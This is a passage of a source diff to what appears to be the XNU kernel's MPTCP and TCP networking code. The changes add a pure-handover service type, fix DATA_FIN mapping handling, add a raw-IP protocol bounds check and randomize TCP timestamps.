No need for cell! */ + if (mpts->mpts_flags & MPTSF_CONNECTED && + !mptcp_subflow_disconnecting(mpts)) { + mptcp_remove_cell_subflows(mpte); + break; + } + } } /* @@ -1200,6 +1274,10 @@ mptcp_check_subflows_and_remove(struct mptses *mpte) socket_lock_assert_owned(mptetoso(mpte)); + if (mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { + mptcp_pure_handover_subflows_remove(mpte); + } + if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { mptcp_handover_subflows_remove(mpte); } @@ -1542,6 +1620,7 @@ mptcp_subflow_necp_cb(void *handle, __unused int action, mptcp_sched_create_subflows(mpte); if ((mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || + mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER || mpte->mpte_svctype == MPTCP_SVCTYPE_TARGET_BASED) && viable != NULL) { *viable = 1; @@ -1639,6 +1718,9 @@ mptcp_subflow_socreate(struct mptses *mpte, struct mptsub *mpts, int dom, if (mp_so->so_flags1 & SOF1_DATA_IDEMPOTENT) { (*so)->so_flags1 |= SOF1_DATA_IDEMPOTENT; } + if (mp_so->so_flags1 & SOF1_DATA_AUTHENTICATED) { + (*so)->so_flags1 |= SOF1_DATA_AUTHENTICATED; + } /* Inherit uuid and create the related flow. 
*/ if (!uuid_is_null(mpsotomppcb(mp_so)->necp_client_uuid)) { @@ -1920,7 +2002,7 @@ mptcp_subflow_soconnectx(struct mptses *mpte, struct mptsub *mpts) static int mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn, - uint32_t rseq, uint16_t dlen) + uint32_t rseq, uint16_t dlen, uint8_t dfin) { struct mptsub *mpts = sototcpcb(so)->t_mpsub; @@ -1935,12 +2017,14 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn, if (m->m_pkthdr.pkt_flags & PKTF_MPTCP) { if (off && (dsn != m->m_pkthdr.mp_dsn || rseq != m->m_pkthdr.mp_rseq || - dlen != m->m_pkthdr.mp_rlen)) { - os_log_error(mptcp_log_handle, "%s - %lx: Received incorrect second mapping: %u - %u , %u - %u, %u - %u\n", + dlen != m->m_pkthdr.mp_rlen || + dfin != !!(m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN))) { + os_log_error(mptcp_log_handle, "%s - %lx: Received incorrect second mapping: DSN: %u - %u , SSN: %u - %u, DLEN: %u - %u, DFIN: %u - %u\n", __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpts->mpts_mpte), (uint32_t)dsn, (uint32_t)m->m_pkthdr.mp_dsn, rseq, m->m_pkthdr.mp_rseq, - dlen, m->m_pkthdr.mp_rlen); + dlen, m->m_pkthdr.mp_rlen, + dfin, !!(m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN)); soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST); return -1; @@ -1948,12 +2032,12 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn, } /* If mbuf is beyond right edge of the mapping, we need to split */ - if (m_pktlen(m) > dlen - off) { - struct mbuf *new = m_split(m, dlen - off, M_DONTWAIT); + if (m_pktlen(m) > dlen - dfin - off) { + struct mbuf *new = m_split(m, dlen - dfin - off, M_DONTWAIT); if (new == NULL) { - os_log_error(mptcp_log_handle, "%s - %lx: m_split failed dlen %u off %d pktlen %d, killing subflow %d", + os_log_error(mptcp_log_handle, "%s - %lx: m_split failed dlen %u dfin %u off %d pktlen %d, killing subflow %d", __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpts->mpts_mpte), - dlen, off, m_pktlen(m), + dlen, dfin, off, m_pktlen(m), 
mpts->mpts_connid); soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST); @@ -1973,10 +2057,19 @@ mptcp_adj_rmap(struct socket *so, struct mbuf *m, int off, uint64_t dsn, m->m_pkthdr.pkt_flags |= PKTF_MPTCP; m->m_pkthdr.mp_dsn = dsn + off; m->m_pkthdr.mp_rseq = rseq + off; - VERIFY(m_pktlen(m) < UINT16_MAX); m->m_pkthdr.mp_rlen = (uint16_t)m_pktlen(m); + /* Only put the DATA_FIN-flag on the last mbuf of this mapping */ + if (dfin) { + if (m->m_pkthdr.mp_dsn + m->m_pkthdr.mp_rlen < dsn + dlen - dfin) { + m->m_pkthdr.pkt_flags &= ~PKTF_MPTCP_DFIN; + } else { + m->m_pkthdr.pkt_flags |= PKTF_MPTCP_DFIN; + } + } + + mpts->mpts_flags |= MPTSF_FULLY_ESTABLISHED; return 0; @@ -2123,7 +2216,8 @@ mptcp_subflow_soreceive(struct socket *so, struct sockaddr **psa, SBLASTMBUFCHK(&so->so_rcv, "mptcp_subflow_soreceive 1"); while (m != NULL) { - int dlen = 0, dfin = 0, error_out = 0; + int dlen = 0, error_out = 0, off = 0; + uint8_t dfin = 0; struct mbuf *start = m; uint64_t dsn; uint32_t sseq; @@ -2202,6 +2296,7 @@ fallback: if (m_iter->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) { dfin = 1; + dlen--; } break; @@ -2232,13 +2327,14 @@ fallback: if (m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) { dfin = 1; + dlen--; } } /* * Check if the full mapping is now present */ - if ((int)so->so_rcv.sb_cc < dlen - dfin) { + if ((int)so->so_rcv.sb_cc < dlen) { if (*mp0 == NULL) { error = EWOULDBLOCK; } @@ -2246,8 +2342,9 @@ fallback: } /* Now, get the full mapping */ + off = 0; while (dlen > 0) { - if (mptcp_adj_rmap(so, m, orig_dlen - dlen, dsn, sseq, orig_dlen)) { + if (mptcp_adj_rmap(so, m, off, dsn, sseq, orig_dlen, dfin)) { error_out = 1; error = EIO; dlen = 0; @@ -2256,6 +2353,7 @@ fallback: } dlen -= m->m_len; + off += m->m_len; sbfree(&so->so_rcv, m); if (mp != NULL) { @@ -2265,11 +2363,7 @@ fallback: *mp = NULL; } - if (dlen - dfin == 0) { - dlen = 0; - } - - VERIFY(dlen <= 0 || m); + VERIFY(dlen == 0 || m); } VERIFY(dlen == 0); @@ -2745,6 +2839,23 @@ 
mptcp_subflow_disconnect(struct mptses *mpte, struct mptsub *mpts) send_dfin = 1; } + if (mp_so->so_flags & SOF_DEFUNCT) { + errno_t ret; + + ret = sosetdefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL, TRUE); + if (ret == 0) { + ret = sodefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL); + + if (ret != 0) { + os_log_error(mptcp_log_handle, "%s - %lx: sodefunct failed with %d\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret); + } + } else { + os_log_error(mptcp_log_handle, "%s - %lx: sosetdefunct failed with %d\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret); + } + } + if (!(so->so_state & (SS_ISDISCONNECTING | SS_ISDISCONNECTED)) && (so->so_state & SS_ISCONNECTED)) { mptcplog((LOG_DEBUG, "%s: cid %d fin %d\n", @@ -2755,26 +2866,9 @@ mptcp_subflow_disconnect(struct mptses *mpte, struct mptsub *mpts) mptcp_send_dfin(so); } - if (mp_so->so_flags & SOF_DEFUNCT) { - errno_t ret; - - ret = sosetdefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL, TRUE); - if (ret == 0) { - ret = sodefunct(NULL, so, SHUTDOWN_SOCKET_LEVEL_DISCONNECT_ALL); - - if (ret != 0) { - os_log_error(mptcp_log_handle, "%s - %lx: sodefunct failed with %d\n", - __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret); - } - } else { - os_log_error(mptcp_log_handle, "%s - %lx: sosetdefunct failed with %d\n", - __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), ret); - } - } else { - (void) soshutdownlock(so, SHUT_RD); - (void) soshutdownlock(so, SHUT_WR); - (void) sodisconnectlocked(so); - } + (void) soshutdownlock(so, SHUT_RD); + (void) soshutdownlock(so, SHUT_WR); + (void) sodisconnectlocked(so); } /* @@ -3350,6 +3444,9 @@ done_sending: */ error = 0; } else { + /* We need to revert our change to mpts_rel_seq */ + mpts->mpts_rel_seq -= tot_sent; + os_log_error(mptcp_log_handle, "%s - %lx: %u error %d len %d subflags %#x sostate %#x soerror %u hiwat %u lowat %u\n", __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), mpts->mpts_connid, error, tot_sent, so->so_flags, 
so->so_state, so->so_error, so->so_snd.sb_hiwat, so->so_snd.sb_lowat); } @@ -3399,9 +3496,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m) /* m is already fully covered by the next mbuf in the queue */ if (n->m_pkthdr.mp_dsn == m->m_pkthdr.mp_dsn && n->m_pkthdr.mp_rlen >= m->m_pkthdr.mp_rlen) { - mptcplog((LOG_DEBUG, "%s fully covered with len %u\n", - __func__, n->m_pkthdr.mp_rlen), - MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE); + os_log(mptcp_log_handle, "%s - %lx: dsn %u dlen %u rseq %u fully covered with len %u\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), + (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen, + m->m_pkthdr.mp_rseq, n->m_pkthdr.mp_rlen); goto dont_queue; } @@ -3409,10 +3507,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m) if (m->m_pkthdr.mp_dsn + m->m_pkthdr.mp_rlen >= n->m_pkthdr.mp_dsn + n->m_pkthdr.mp_rlen) { struct mbuf *tmp = n->m_nextpkt; - mptcplog((LOG_DEBUG, "%s m is covering that guy dsn %u len %u dsn %u len %u\n", - __func__, (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen, - (uint32_t)n->m_pkthdr.mp_dsn, n->m_pkthdr.mp_rlen), - MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE); + os_log(mptcp_log_handle, "%s - %lx: m (dsn %u len %u) is covering existing mbuf (dsn %u len %u)\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), + (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen, + (uint32_t)n->m_pkthdr.mp_dsn, n->m_pkthdr.mp_rlen); m->m_nextpkt = NULL; if (prev == NULL) { @@ -3429,9 +3527,10 @@ mptcp_add_reinjectq(struct mptses *mpte, struct mbuf *m) if (prev) { /* m is already fully covered by the previous mbuf in the queue */ if (prev->m_pkthdr.mp_dsn + prev->m_pkthdr.mp_rlen >= m->m_pkthdr.mp_dsn + m->m_pkthdr.len) { - mptcplog((LOG_DEBUG, "%s prev covers us from %u with len %u\n", - __func__, (uint32_t)prev->m_pkthdr.mp_dsn, prev->m_pkthdr.mp_rlen), - MPTCP_SOCKET_DBG, MPTCP_LOGLVL_VERBOSE); + os_log(mptcp_log_handle, "%s - %lx: prev (dsn %u len %u) covers us (dsn %u len %u)\n", + __func__, (unsigned 
long)VM_KERNEL_ADDRPERM(mpte), + (uint32_t)prev->m_pkthdr.mp_dsn, prev->m_pkthdr.mp_rlen, + (uint32_t)m->m_pkthdr.mp_dsn, m->m_pkthdr.mp_rlen); goto dont_queue; } } @@ -3547,6 +3646,7 @@ mptcp_reinject_mbufs(struct socket *so) m = sb->sb_mb; while (m) { struct mbuf *n = m->m_next, *orig = m; + bool set_reinject_flag = false; mptcplog((LOG_DEBUG, "%s working on suna %u relseq %u iss %u len %u pktflags %#x\n", __func__, tp->snd_una, m->m_pkthdr.mp_rseq, mpts->mpts_iss, @@ -3587,6 +3687,7 @@ mptcp_reinject_mbufs(struct socket *so) */ mptcp_add_reinjectq(mpte, m); + set_reinject_flag = true; orig->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ; next: @@ -3598,7 +3699,9 @@ next: break; } - n->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ; + if (set_reinject_flag) { + n->m_pkthdr.pkt_flags |= PKTF_MPTCP_REINJ; + } n = n->m_next; } @@ -3969,11 +4072,9 @@ mptcp_handle_ipv6_connection(struct mptses *mpte, const struct mptsub *mpts) ifp = sotoinpcb(so)->inp_last_outifp; if (ifnet_get_nat64prefix(ifp, nat64prefixes) == ENOENT) { - mptcp_ask_for_nat64(ifp); return; } - for (j = 0; j < NAT64_MAX_NUM_PREFIXES; j++) { int success; @@ -3983,11 +4084,11 @@ mptcp_handle_ipv6_connection(struct mptses *mpte, const struct mptsub *mpts) success = mptcp_desynthesize_ipv6_addr(&mpte->__mpte_dst_v6.sin6_addr, &nat64prefixes[j], - &mpte->mpte_dst_v4_nat64.sin_addr); + &mpte->mpte_sub_dst_v4.sin_addr); if (success) { - mpte->mpte_dst_v4_nat64.sin_len = sizeof(mpte->mpte_dst_v4_nat64); - mpte->mpte_dst_v4_nat64.sin_family = AF_INET; - mpte->mpte_dst_v4_nat64.sin_port = mpte->__mpte_dst_v6.sin6_port; + mpte->mpte_sub_dst_v4.sin_len = sizeof(mpte->mpte_sub_dst_v4); + mpte->mpte_sub_dst_v4.sin_family = AF_INET; + mpte->mpte_sub_dst_v4.sin_port = mpte->__mpte_dst_v6.sin6_port; break; } } @@ -4151,7 +4252,7 @@ mptcp_subflow_connected_ev(struct mptses *mpte, struct mptsub *mpts, mptcp_notify_mpfail(so); } else { if (IFNET_IS_CELLULAR(inp->inp_last_outifp) && - mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) { + 
mptcp_subflows_need_backup_flag(mpte)) { tp->t_mpflags |= (TMPF_BACKUP_PATH | TMPF_SND_MPPRIO); } else { mpts->mpts_flags |= MPTSF_PREFERRED; @@ -4186,7 +4287,7 @@ mptcp_subflow_connected_ev(struct mptses *mpte, struct mptsub *mpts, */ if (IFNET_IS_CELLULAR(inp->inp_last_outifp) && !(tp->t_mpflags & TMPF_BACKUP_PATH) && - mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) { + mptcp_subflows_need_backup_flag(mpte)) { tp->t_mpflags |= (TMPF_BACKUP_PATH | TMPF_SND_MPPRIO); mpts->mpts_flags &= ~MPTSF_PREFERRED; } else { @@ -6276,6 +6377,7 @@ mptcp_wifi_status_changed(void) /* Only handover- and urgency-mode are purely driven by Symptom's Wi-Fi status */ if (mpte->mpte_svctype != MPTCP_SVCTYPE_HANDOVER && + mpte->mpte_svctype != MPTCP_SVCTYPE_PURE_HANDOVER && mpte->mpte_svctype != MPTCP_SVCTYPE_TARGET_BASED) { goto next; } @@ -6290,12 +6392,68 @@ next: lck_mtx_unlock(&mtcbinfo.mppi_lock); } +struct mptcp_uuid_search_info { + uuid_t target_uuid; + proc_t found_proc; + boolean_t is_proc_found; +}; + +static int +mptcp_find_proc_filter(proc_t p, void *arg) +{ + struct mptcp_uuid_search_info *info = (struct mptcp_uuid_search_info *)arg; + int found; + + if (info->is_proc_found) { + return 0; + } + + /* + * uuid_compare returns 0 if the uuids are matching, but the proc-filter + * expects != 0 for a matching filter. 
+ */ + found = uuid_compare(p->p_uuid, info->target_uuid) == 0; + if (found) { + info->is_proc_found = true; + } + + return found; +} + +static int +mptcp_find_proc_callout(proc_t p, void * arg) +{ + struct mptcp_uuid_search_info *info = (struct mptcp_uuid_search_info *)arg; + + if (uuid_compare(p->p_uuid, info->target_uuid) == 0) { + info->found_proc = p; + return PROC_CLAIMED_DONE; + } + + return PROC_RETURNED; +} + +static proc_t +mptcp_find_proc(const uuid_t uuid) +{ + struct mptcp_uuid_search_info info; + + uuid_copy(info.target_uuid, uuid); + info.found_proc = PROC_NULL; + info.is_proc_found = false; + + proc_iterate(PROC_ALLPROCLIST, mptcp_find_proc_callout, &info, + mptcp_find_proc_filter, &info); + + return info.found_proc; +} + void mptcp_ask_symptoms(struct mptses *mpte) { struct mptcp_symptoms_ask_uuid ask; struct socket *mp_so; - struct proc *p; + struct proc *p = PROC_NULL; int pid, prio, err; if (mptcp_kern_skt_unit == 0) { @@ -6307,26 +6465,50 @@ mptcp_ask_symptoms(struct mptses *mpte) mp_so = mptetoso(mpte); if (mp_so->so_flags & SOF_DELEGATED) { - pid = mp_so->e_pid; - } else { - pid = mp_so->last_pid; - } + if (mpte->mpte_epid != 0) { + p = proc_find(mpte->mpte_epid); + if (p != PROC_NULL) { + /* We found a pid, check its UUID */ + if (uuid_compare(mp_so->e_uuid, p->p_uuid)) { + /* It's not the same - we need to look for the real proc */ + proc_rele(p); + p = PROC_NULL; + } + } + } - p = proc_find(pid); - if (p == PROC_NULL) { - os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for pid %u\n", - __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), pid); - return; - } + if (p == PROC_NULL) { + p = mptcp_find_proc(mp_so->e_uuid); + if (p == PROC_NULL) { + uuid_string_t uuid_string; + uuid_unparse(mp_so->e_uuid, uuid_string); - ask.cmd = MPTCP_SYMPTOMS_ASK_UUID; + os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for uuid %s\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), uuid_string); - if (mp_so->so_flags & 
SOF_DELEGATED) { + return; + } + mpte->mpte_epid = proc_pid(p); + } + + pid = mpte->mpte_epid; uuid_copy(ask.uuid, mp_so->e_uuid); } else { + pid = mp_so->last_pid; + + p = proc_find(pid); + if (p == PROC_NULL) { + os_log_error(mptcp_log_handle, "%s - %lx: Couldn't find proc for pid %u\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), pid); + return; + } + uuid_copy(ask.uuid, mp_so->last_uuid); } + + ask.cmd = MPTCP_SYMPTOMS_ASK_UUID; + prio = proc_get_effective_task_policy(proc_task(p), TASK_POLICY_ROLE); if (prio == TASK_BACKGROUND_APPLICATION || prio == TASK_NONUI_APPLICATION || diff --git a/bsd/netinet/mptcp_usrreq.c b/bsd/netinet/mptcp_usrreq.c index ff16b486f..533b1ac30 100644 --- a/bsd/netinet/mptcp_usrreq.c +++ b/bsd/netinet/mptcp_usrreq.c @@ -109,6 +109,10 @@ int mptcp_developer_mode = 0; SYSCTL_INT(_net_inet_mptcp, OID_AUTO, allow_aggregate, CTLFLAG_RW | CTLFLAG_LOCKED, &mptcp_developer_mode, 0, "Allow the Multipath aggregation mode"); +int mptcp_no_first_party = 0; +SYSCTL_INT(_net_inet_mptcp, OID_AUTO, no_first_party, CTLFLAG_RW | CTLFLAG_LOCKED, + &mptcp_no_first_party, 0, "Do not do first-party app exemptions"); + static unsigned long mptcp_expected_progress_headstart = 5000; SYSCTL_ULONG(_net_inet_mptcp, OID_AUTO, expected_progress_headstart, CTLFLAG_RW | CTLFLAG_LOCKED, &mptcp_expected_progress_headstart, "Headstart to give MPTCP before meeting the progress deadline"); @@ -222,6 +226,10 @@ mptcp_entitlement_check(struct socket *mp_so, uint8_t svctype) { struct mptses *mpte = mpsotompte(mp_so); + if (mptcp_no_first_party) { + return 0; + } + /* First, check for mptcp_extended without delegation */ if (soopt_cred_check(mp_so, PRIV_NET_RESTRICTED_MULTIPATH_EXTENDED, TRUE, FALSE) == 0) { /* @@ -341,6 +349,12 @@ mptcp_usr_connectx(struct socket *mp_so, struct sockaddr *src, if ((mp_so->so_state & (SS_ISCONNECTED | SS_ISCONNECTING)) == 0) { memcpy(&mpte->mpte_u_dst, dst, dst->sa_len); + + if (dst->sa_family == AF_INET) { + 
memcpy(&mpte->mpte_sub_dst_v4, dst, dst->sa_len); + } else { + memcpy(&mpte->mpte_sub_dst_v6, dst, dst->sa_len); + } } if (src) { @@ -887,7 +901,7 @@ mptcp_disconnect(struct mptses *mpte) struct socket *, mp_so, struct mptcb *, mp_tp); /* if we're not detached, go thru socket state checks */ - if (!(mp_so->so_flags & SOF_PCBCLEARING)) { + if (!(mp_so->so_flags & SOF_PCBCLEARING) && !(mp_so->so_flags & SOF_DEFUNCT)) { if (!(mp_so->so_state & (SS_ISCONNECTED | SS_ISCONNECTING))) { error = ENOTCONN; @@ -953,7 +967,7 @@ mptcp_finish_usrclosed(struct mptses *mpte) struct mptcb *mp_tp = mpte->mpte_mptcb; struct socket *mp_so = mptetoso(mpte); - if (mp_tp->mpt_state == MPTCPS_CLOSED) { + if (mp_tp->mpt_state == MPTCPS_CLOSED || mp_tp->mpt_state == MPTCPS_TERMINATE) { mpte = mptcp_close(mpte, mp_tp); } else if (mp_tp->mpt_state >= MPTCPS_FIN_WAIT_2) { soisdisconnected(mp_so); @@ -982,7 +996,8 @@ mptcp_usrclosed(struct mptses *mpte) mptcp_close_fsm(mp_tp, MPCE_CLOSE); /* Not everything has been acknowledged - don't close the subflows! 
*/ - if (mp_tp->mpt_sndnxt + 1 != mp_tp->mpt_sndmax) { + if (mp_tp->mpt_state != MPTCPS_TERMINATE && + mp_tp->mpt_sndnxt + 1 != mp_tp->mpt_sndmax) { return mpte; } @@ -1648,6 +1663,7 @@ mptcp_setopt(struct mptses *mpte, struct sockopt *sopt) case PERSIST_TIMEOUT: case TCP_ADAPTIVE_READ_TIMEOUT: case TCP_ADAPTIVE_WRITE_TIMEOUT: + case TCP_FASTOPEN_FORCE_ENABLE: /* eligible; record it */ break; case TCP_NOTSENT_LOWAT: @@ -2011,6 +2027,7 @@ mptcp_getopt(struct mptses *mpte, struct sockopt *sopt) case TCP_RXT_CONNDROPTIME: case TCP_ADAPTIVE_READ_TIMEOUT: case TCP_ADAPTIVE_WRITE_TIMEOUT: + case TCP_FASTOPEN_FORCE_ENABLE: { struct mptopt *mpo = mptcp_sopt_find(mpte, sopt); @@ -2213,6 +2230,8 @@ mptcp_sopt2str(int level, int optname) return "ADAPTIVE_READ_TIMEOUT"; case TCP_ADAPTIVE_WRITE_TIMEOUT: return "ADAPTIVE_WRITE_TIMEOUT"; + case TCP_FASTOPEN_FORCE_ENABLE: + return "TCP_FASTOPEN_FORCE_ENABLE"; case MPTCP_SERVICE_TYPE: return "MPTCP_SERVICE_TYPE"; case MPTCP_ALTERNATE_PORT: diff --git a/bsd/netinet/mptcp_var.h b/bsd/netinet/mptcp_var.h index cc16b1c70..17aa71b78 100644 --- a/bsd/netinet/mptcp_var.h +++ b/bsd/netinet/mptcp_var.h @@ -93,10 +93,8 @@ struct mptses { #define __mpte_dst_v4 mpte_u_dst._mpte_dst_v4 #define __mpte_dst_v6 mpte_u_dst._mpte_dst_v6 - struct sockaddr_in mpte_dst_v4_nat64; - - struct sockaddr_in mpte_dst_unicast_v4; - struct sockaddr_in6 mpte_dst_unicast_v6; + struct sockaddr_in mpte_sub_dst_v4; + struct sockaddr_in6 mpte_sub_dst_v6; uint16_t mpte_alternate_port; /* Alternate port for subflow establishment (network-byte-order) */ @@ -205,6 +203,12 @@ mptcp_subflow_cwnd_space(struct socket *so) return MIN(cwnd, sbspace(&so->so_snd)); } +static inline bool +mptcp_subflows_need_backup_flag(struct mptses *mpte) +{ + return mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE || + mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER; +} /* * MPTCP socket options @@ -639,7 +643,6 @@ extern void mptcp_ask_symptoms(struct mptses *mpte); extern void 
mptcp_control_register(void); extern int mptcp_is_wifi_unusable_for_session(struct mptses *mpte); extern boolean_t symptoms_is_wifi_lossy(void); -extern void mptcp_ask_for_nat64(struct ifnet *ifp); extern void mptcp_session_necp_cb(void *, int, uint32_t, uint32_t, bool *); extern struct sockaddr *mptcp_get_session_dst(struct mptses *mpte, boolean_t has_v6, boolean_t has_v4); diff --git a/bsd/netinet/raw_ip.c b/bsd/netinet/raw_ip.c index a140e8925..2975ccff1 100644 --- a/bsd/netinet/raw_ip.c +++ b/bsd/netinet/raw_ip.c @@ -934,6 +934,9 @@ rip_attach(struct socket *so, int proto, struct proc *p) if ((so->so_state & SS_PRIV) == 0) { return EPERM; } + if (proto > UINT8_MAX) { + return EINVAL; + } error = soreserve(so, rip_sendspace, rip_recvspace); if (error) { diff --git a/bsd/netinet/tcp.h b/bsd/netinet/tcp.h index b63fc818b..3021fb0b5 100644 --- a/bsd/netinet/tcp.h +++ b/bsd/netinet/tcp.h @@ -293,7 +293,9 @@ struct tcp_notify_ack_complete { #define MPTCP_SVCTYPE_INTERACTIVE 1 #define MPTCP_SVCTYPE_AGGREGATE 2 #define MPTCP_SVCTYPE_TARGET_BASED 3 -#define MPTCP_SVCTYPE_MAX 4 +#define MPTCP_SVCTYPE_PURE_HANDOVER 4 +#define MPTCP_SVCTYPE_MAX 5 + /* * Specify minimum time in seconds before which an established * TCP connection will not be dropped when there is no response from the @@ -322,10 +324,15 @@ struct tcp_notify_ack_complete { #define TCPI_FLAG_STREAMING_ON 0x02 /* Streaming detection on */ struct tcp_conn_status { - unsigned int probe_activated : 1; - unsigned int write_probe_failed : 1; - unsigned int read_probe_failed : 1; - unsigned int conn_probe_failed : 1; + union { + struct { + unsigned int probe_activated : 1; + unsigned int write_probe_failed : 1; + unsigned int read_probe_failed : 1; + unsigned int conn_probe_failed : 1; + }; + uint32_t pad_field; + }; }; /* diff --git a/bsd/netinet/tcp_input.c b/bsd/netinet/tcp_input.c index bb33ba1ac..d91a93a61 100644 --- a/bsd/netinet/tcp_input.c +++ b/bsd/netinet/tcp_input.c @@ -2237,6 +2237,11 @@ findpcb: goto 
dropwithreset; } + /* Now that we found the tcpcb, we can adjust the TCP timestamp */ + if (to.to_flags & TOF_TS) { + to.to_tsecr -= tp->t_ts_offset; + } + TCP_LOG_TH_FLAGS(TCP_LOG_HDR, th, tp, false, ifp); if (tp->t_state == TCPS_CLOSED) { @@ -2889,7 +2894,8 @@ findpcb: * be TH_NEEDSYN. */ if (tp->t_state == TCPS_ESTABLISHED && - (thflags & (TH_SYN | TH_FIN | TH_RST | TH_URG | TH_ACK | TH_ECE | TH_CWR)) == TH_ACK && + !(so->so_state & SS_CANTRCVMORE) && + (thflags & TH_FLAGS) == TH_ACK && ((tp->t_flags & TF_NEEDFIN) == 0) && ((to.to_flags & TOF_TS) == 0 || TSTMP_GEQ(to.to_tsval, tp->ts_recent)) && @@ -3066,11 +3072,6 @@ findpcb: so_recv_data_stat(so, m, 0); m_adj(m, drop_hdrlen); /* delayed header drop */ - /* - * If message delivery (SOF_ENABLE_MSGS) is enabled on - * this socket, deliver the packet received as an - * in-order message with sequence number attached to it. - */ if (isipv6) { memcpy(&saved_hdr, ip6, sizeof(struct ip6_hdr)); ip6 = (struct ip6_hdr *)&saved_hdr[0]; @@ -3929,6 +3930,11 @@ close: close_it = TRUE; } + if (so->so_state & SS_CANTRCVMORE) { + TCP_LOG_DROP_PCB(TCP_LOG_HDR, th, tp, false, "SS_CANTRCVMORE"); + close_it = TRUE; + } + if (close_it) { tp = tcp_close(tp); tcpstat.tcps_rcvafterclose++; @@ -5165,6 +5171,11 @@ dodata: (m->m_pkthdr.pkt_flags & PKTF_MPTCP_DFIN) && (m->m_pkthdr.pkt_flags & PKTF_MPTCP)) { m_adj(m, drop_hdrlen); /* delayed header drop */ + /* + * 0-length DATA_FIN. The rlen is actually 0. 
We special-case the + * byte consumed by the dfin in mptcp_input and mptcp_reass_present + */ + m->m_pkthdr.mp_rlen = 0; mptcp_input(tptomptp(tp)->mpt_mpte, m); tp->t_flags |= TF_ACKNOW; } else { @@ -5457,6 +5468,7 @@ tcp_dooptions(struct tcpcb *tp, u_char *cp, int cnt, struct tcphdr *th, bcopy((char *)cp + 6, (char *)&to->to_tsecr, sizeof(to->to_tsecr)); NTOHL(to->to_tsecr); + to->to_tsecr -= tp->t_ts_offset; /* Re-enable sending Timestamps if we received them */ if (!(tp->t_flags & TF_REQ_TSTMP)) { tp->t_flags |= TF_REQ_TSTMP; diff --git a/bsd/netinet/tcp_output.c b/bsd/netinet/tcp_output.c index 84fe091cc..5eecbbbf5 100644 --- a/bsd/netinet/tcp_output.c +++ b/bsd/netinet/tcp_output.c @@ -155,6 +155,10 @@ SYSCTL_SKMEM_TCP_INT(OID_AUTO, ack_compression_rate, CTLFLAG_RW | CTLFLAG_LOCKED, int, tcp_ack_compression_rate, TCP_COMP_CHANGE_RATE, "Rate at which we force sending new ACKs (in ms)"); +SYSCTL_SKMEM_TCP_INT(OID_AUTO, randomize_timestamps, + CTLFLAG_RW | CTLFLAG_LOCKED, int, tcp_randomize_timestamps, 1, + "Randomize TCP timestamps to prevent tracking (on: 1, off: 0)"); + static int sysctl_change_ecn_setting SYSCTL_HANDLER_ARGS { @@ -1636,7 +1640,7 @@ send: /* Form timestamp option as shown in appendix A of RFC 1323. */ *lp++ = htonl(TCPOPT_TSTAMP_HDR); - *lp++ = htonl(tcp_now); + *lp++ = htonl(tcp_now + tp->t_ts_offset); *lp = htonl(tp->ts_recent); optlen += TCPOLEN_TSTAMP_APPA; } @@ -2814,9 +2818,9 @@ out: } /* * Unless this is due to interface restriction policy, - * treat EHOSTUNREACH/ENETDOWN as a soft error. + * treat EHOSTUNREACH/ENETDOWN/EADDRNOTAVAIL as a soft error. 
